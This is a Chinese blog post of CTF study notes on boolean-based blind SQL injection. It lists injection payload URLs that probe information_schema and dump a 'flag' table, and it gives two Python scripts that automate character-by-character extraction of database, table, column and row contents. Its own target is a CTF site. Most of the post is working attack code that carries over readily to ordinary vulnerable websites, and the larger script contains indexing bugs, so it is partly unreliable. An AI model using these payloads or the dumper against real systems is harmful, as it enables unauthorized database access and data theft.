基于布尔的盲注学习笔记

最新推荐文章于 2024-03-09 10:30:00 发布
最新推荐文章于 2024-03-09 10:30:00 发布
阅读量4.7k 收藏
点赞数
分类专栏: 学习笔记 文章标签: 盲注 基于布尔盲注 CTF 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/squeen_/article/details/52767887
版权
exp利用到的ctf题: 简单的sql注入之3

步骤:
首先测试是否为布尔盲注:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#

若为布尔盲注,则按照以下步骤进行:
一、得到数据库的长度
http://localhost/index.php?id=2' and length(database())>1%23
二、获取数据库名称
姿势: http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
python脚本自动获取: 
import requests

def getDBName(DBName_len):
    DBName = ""
   
    success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
    success_response_len = len(requests.get(success_url).text)
   
    url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
   
    print("Start to retrieve database name...")
    print("Success_response_len is: ", success_response_len)
    for i in range( 1, DBName_len + 1):
        print("Number of letter: " , i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended." )
            exit()
    print("Retrieve completed! DBName is: " + DBName)
   
getDBName(5)


三、获取表长度
姿势: http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
四、获取表名
和第二步获得数据库名差不多,姿势稍微变了一下:
http://localhost/index.php?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)), {0}, 1)={1}%23
五、获取字段的个数和长度
姿势: http://localhost/index.php?id=2' and (select length(column_name) from information_schema.columns where table_name = 0x666C6167 limit 0,1)>0%23
其中limit 0,1表示第一列,limit 1,1为第二列,依次类推。
六、获取字段名称
姿势: http://localhost/index.php?id=2' and ascii(substr((select column_name from information_schema.columns where table_name = 0x666C6167 limit 0,1), {0}, 1))={1}%23
七、脱裤
1.首先判断有该表有多少条记录:
http://localhost/index.php?id=2' and (select count(*) from flag)>0%23
2.然后获取当前记录的长度:
http://localhost/index.php?id=2' and (select length(flag) from flag limit 0,1)>0%23
3.获取当前记录的值:
http://localhost/index.php?id=2' and ascii(substr((select flag from flag limit 0,1), {0}, 1))={1}%23




自己写的脚本: 
import requests
import binascii

MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
success_response_len = len(requests.get(success_url).text)
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz{}_!@#$%^&*()'

def get_DBName_len():
    print("Start to get DBName_len...")
    DBName_len = 0
    url_template = success_url + "' and (length(database()))>{0}%23"
    for i in range(0, MAX_DBName_len):
        url = url_template.format(i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            DBName_len = i;
            print("DBName_len is: ", DBName_len)
            break;
    if DBName_len == 0:
        if i == MAX_DBName_len - 1:
            print("DBName_len > MAX_DBName_len!")
        print("Cannot get DB_len. Program ended.")
        exit()
    return DBName_len

def get_DBName(DBName_len):
    print("Start to retrieve database name...")
    DBName = ""
    url_template = success_url + "' and ascii(substr(database(),{0},1))={1}%23"   
    for i in range(1, DBName_len + 1):
        print("Number of letter: ", i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        if tempDBName == DBName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! DBName is: " + DBName)
    return DBName

def get_TableName_len(Table_num):
    print("Start to get TableName_len...")
    TableName_len = 0
    url_template = success_url + "' and (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)>{1}%23"
    for i in range(0, MAX_TableName_len):
        url = url_template.format(Table_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            TableName_len = i
#             print("TabelName_len is: ", TableName_len)
            break
    if TableName_len == 0:
        if i == MAX_TableName_len - 1:
            print("TableName_len > MAX_TableName_len!")
#         print("Cannot get TableName_len. Program ended.")
    return TableName_len

def get_TableName(Table_num, TableName_len):
    print("Start to get TableName...")
    TableName = ""
    url_template = success_url + "' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}%23"   
    for i in range(1, TableName_len + 1):
        print("Number of letter: ", i)
        tempTableName = TableName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(Table_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                TableName += char
                print("TableName is: " + TableName + "...")
                break           
        if tempTableName == TableName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! TableName is: " + TableName)
    return TableName

def choose_Table():
    Tables = []
    for Table_num in range(1, MAX_Table_Num):
        TableName_len = get_TableName_len(Table_num)
        if TableName_len == 0:
            break
        TableName = get_TableName(Table_num, TableName_len)
        Tables.append(TableName)
    for i in range(len(Tables)):
        print(i, ": " + Tables[i - 1])
    value = input('Please input number to choose which table you want to dump:')
    Table_num_chosen = int(value)
    print("You have chose table: " + Tables[Table_num_chosen - 1])
    return Tables[Table_num_chosen - 1]

def get_ColumnName_len(Column_num, TableName):
    print("Start to get ColumnName_len...")
    ColumnName_len = 0
    url_template = success_url + "' and (select length(column_name) from information_schema.columns where table_name = {0} limit {1},1)>{2}%23"
    for i in range(0, MAX_ColumnName_len):
        url = url_template.format(str2hex(TableName), Column_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            ColumnName_len = i
            print("ColumnName_len is: ", ColumnName_len)
            break
    if ColumnName_len == 0:
        if i == MAX_ColumnName_len - 1:
            print("ColumnName_len > MAXName_Column_len!")
    return ColumnName_len

def get_ColumnName(Column_num, ColumnName_len, TableName):
    print("Start to get ColumnName...")
    ColumnName = ""
    url_template = success_url + "' and ascii(substr((select column_name from information_schema.columns where table_name = {0} limit {1},1),{2},1))={3}%23"   
    for i in range(1, ColumnName_len + 1):
        print("Number of letter: ", i)
        tempColumnName = ColumnName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(str2hex(TableName), Column_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                ColumnName += char
                print("ColumnName is: " + ColumnName + "...")
                break           
        if tempColumnName == ColumnName:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! ColumnName is: " + ColumnName)
    return ColumnName

def get_Columns(TableName):
    Columns = []
    for Column_num in range(1, MAX_Column_Num):
        ColumnName_len = get_ColumnName_len(Column_num, TableName)
        if ColumnName_len == 0:
            break
        ColumnName = get_ColumnName(Column_num, ColumnName_len, TableName)
        Columns.append(ColumnName)
    for i in range(len(Columns)):
        print(i, ": " + Columns[i - 1])
    return Columns

def get_Data_len(TableName, ColumnName, Data_num):
    print("Start to get Data_len...")
    Data_len = 0
    url_template = success_url + "' and (select length({0}) from {1} limit {2},1)>{3}%23"
    for i in range(0, MAX_Data_len):
        url = url_template.format(ColumnName, TableName, Data_num - 1, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            Data_len = i
            print("Data_len is: ", Data_len)
            break
    if Data_len == 0:
        if i == MAX_Data_len - 1:
            print("Data_len > MAX_Data_len!")
    return Data_len

def get_Data(TableName, ColumnName, Data_num, Data_len):
    print("Start to get Data...")
    Data = ""
    url_template = success_url + "' and ascii(substr((select {0} from {1} limit {2},1),{3},1))={4}%23"   
    for i in range(1, Data_len + 1):
        print("Number of letter: ", i)
        tempData = Data
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(ColumnName, TableName, Data_num - 1, i, char_ascii)
            response = requests.get(url)
            if len(response.text) == success_response_len:
                Data += char
                print("Data is: " + Data + "...")
                break           
        if tempData == Data:
            print("Letters too little! Program ended.")
            exit()
    print("Retrieve completed! Data is: " + Data)
    return Data

def get_Data_num(TableName):
    print("Start to get Data_num...")
    Data_num = 0
    url_template = success_url + "' and (select count(*) from {0})>{1}%23"
    for i in range(0, MAX_Data_Num):
        url = url_template.format(TableName, i)
        response = requests.get(url)
        if len(response.text) != success_response_len:
            Data_num = i
            print("Data_num is: ", Data_num)
            break
    if Data_num == 0:
        if i == MAX_Data_Num - 1:
            print("Data_num > MAX_Data_Num!")
        print("Cannot get Data_len.")
    return Data_num

def str2hex(str):
    result = "0x"
    str_byte = str.encode()
    result = result + binascii.b2a_hex(str_byte).decode()
    return result

DBName_len = get_DBName_len()
DBName = get_DBName(DBName_len)

TableName = choose_Table()
Columns = get_Columns(TableName)
Data_num = get_Data_num(TableName)

Datas = []
for i in range(len(Columns)):
    ColumnName = Columns[i]
    for j in range(Data_num):
        Data_len = get_Data_len(TableName, ColumnName, Data_num)
        Data = get_Data(TableName, ColumnName, Data_num, Data_len)
        Datas[j] += "\t" + Data

print("***************************")
print("Database: " + DBName + "Table: " + TableName)
print("***************************")
print("\t")
for i in range(len(Columns)):
    print(Columns[i], end="\t")
for i in range(Data_num):
    print(Datas[i])
print("Program successfully ended!")
print("***************************")
# #the first table
# Table_num = 1
# TableName_len = get_TableName_len(Table_num)
# TableName = get_TableName(Table_num, TableName_len)
#
# #the first column
# Column_num = 1
# ColumnName_len = get_ColumnName_len(Column_num, TableName)
# ColumnName = get_ColumnName(Column_num, ColumnName_len)
# 
# #the first record
# Data_num = 1
# Data_len = get_Data_len(TableName, ColumnName, Data_num)
# Data = get_Data(TableName, ColumnName, Data_num, Data_len)
#
# print("***************************")
# print("Database: " + DBName)
# print("Table: " + TableName)
# print("Column: " + ColumnName)
# print("Data: " + Data)
# print("Program successfully ended!")
# print("***************************")


Squeen_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注的python脚本,其中语句需要根据环境条件做改变
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
SQL盲注-实战布尔盲注
最新发布
dkxkl1314的博客
03-09 1368
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现,爆的比较慢,仅供参考。
mysql 16进制 绕过_注入绕过技巧
weixin_39846361的博客
01-20 2668
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20%09%0a %0b %0c %0d %a0/**/最基本的绕过方法,用注释替换空格:/*注释*/2.括号绕过空格:如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:...
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3295
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
sqli-labs盲注脚本
qq_35599248的博客
02-04 994
sqli-labs盲注脚本 这两天sqli-labs上学习sql注入,现在才分清盲注和其他注入有什么区别,以及为什么会用这种费力不讨好的东西(是我太菜) 先来大致说一下盲注吧,盲注故名思意就是猜,一个一个去试,然后根据if判断返回不同的结果判断猜测是否正确。 盲注又分布尔盲注和时间盲注 布尔盲注就是只要正确执行页面就返回都一样,错误执行就有点不同,如下 我更喜欢根据返回长度判断,也可以根据返回内容是否含有(You are in.......)判断 url="http://1...
(sqlmap)【sqli-labs8-10】盲注布尔盲注、时间盲注
07-06 3279
【sqlmap-跑盲注靶场】
渗透测试基础-盲注布尔盲注和时间盲注
weixin_45488495的博客
04-09 3195
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
【SQL注入-布尔盲注
weixin_52613207的博客
06-11 136
如果对方的页面既没有回显位,也没有报错,就可以看页面是否有真假值这个状态,如果有真假值这两种状态中切换的话,就可以使用布尔盲注。页面没有报错也没有回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL盲注注入布尔盲注:web页面只返回True真,False假两种类型。利用页面返回不同,逐个猜解数据。id=1' and 1=1 --+为真页面;id=1' and 1=2 --+为假页面。函数substr((),1,1)从第一个字符开始,显示1个字符;布尔盲注、时间盲注、报错盲注
SQL注入-盲注布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
【SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6588
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
布尔盲注
m0_52880296的博客
05-06 3958
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 605
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
Python自动化sql注入布尔盲注
qq_46145027的博客
04-22 2802
在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1722
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
写一个布尔盲注的脚本
weixin_35752645的博客
01-01 458
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
post基于布尔盲注
05-05
基于布尔盲注是一种常见的SQL注入攻击技术,可以通过构造特定的SQL查询语句来获取数据库中的敏感信息。在这种攻击中,攻击者通过向受攻击的应用程序中输入恶意的SQL代码来触发漏洞。 在基于布尔盲注中,攻击者利用应用程序返回的不同响应来判断SQL查询结果是否为真或假。攻击者可以通过构造一系列的布尔查询来逐渐推断出数据库中的敏感信息。例如,攻击者可以通过构造以下查询语句来判断数据库中是否存在用户名为“admin”的记录: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND 1=1 ``` 如果应用程序返回的响应为真,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password = 'password' AND 1=1 ``` 如果应用程序返回的响应为假,那么攻击者可以通过构造以下查询语句来判断密码是否为“password”: ``` SELECT COUNT(*) FROM users WHERE username = 'admin' AND password <> 'password' AND 1=1 ``` 通过不断尝试构造不同的查询语句,并观察应用程序的响应,攻击者可以最终推断出数据库中的敏感信息。 为了防止基于布尔盲注攻击,应用程序应该对用户输入进行充分的验证和过滤,并使用参数化的SQL查询语句来避免SQL注入攻击。此外,应用程序还应该限制数据库用户的权限,以最小化攻击者获取敏感信息的可能性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值